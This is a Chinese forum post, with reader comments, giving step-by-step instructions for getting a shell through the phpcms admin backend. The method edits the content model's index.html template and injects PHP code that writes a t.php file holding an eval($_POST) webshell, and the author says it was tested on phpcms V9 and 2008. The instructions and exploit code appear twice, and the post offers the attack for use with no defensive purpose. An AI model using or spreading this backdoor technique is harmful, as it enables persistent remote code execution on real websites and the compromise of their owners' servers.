phpcms后台通杀拿shell
先是发到乌云了,结果是内容太简单 不给审核通过 罢了罢了 不发到那里了
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
关于作者
评论46次
费解。以后HTML也不安全类
乌云不支持,咱支持~~~~~
谢谢分享 ,收藏拿走
感谢分享
主页会去载模板,包含的时候会执行。
是不是apache的 我记得有配置可以配置html当php执行
不错不错。
测试一下,感谢。
支持原创
新建模板也行的
后台对模板进行处理的时候,进行了包含的操作。 导致代码执行。 phpcms 后台getshell 的地方太多了
感谢小k牛 已收到
没意思哦
phpcms 后台有代码执行呢
我 测式了个 2008的站 。。LZ 说的 界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改 没有看到什么 {template "content","footer"},对针对 2008 描述清楚点吗
内容模块 content 1.0 2010-09-06 2010-09-06 禁止 禁止了肿么办?
以前的吧?
生成会触发PHP代码 那岂不是很多静态生成的后台都有这个洞
的确是个迷点 html怎么会解析PHP代码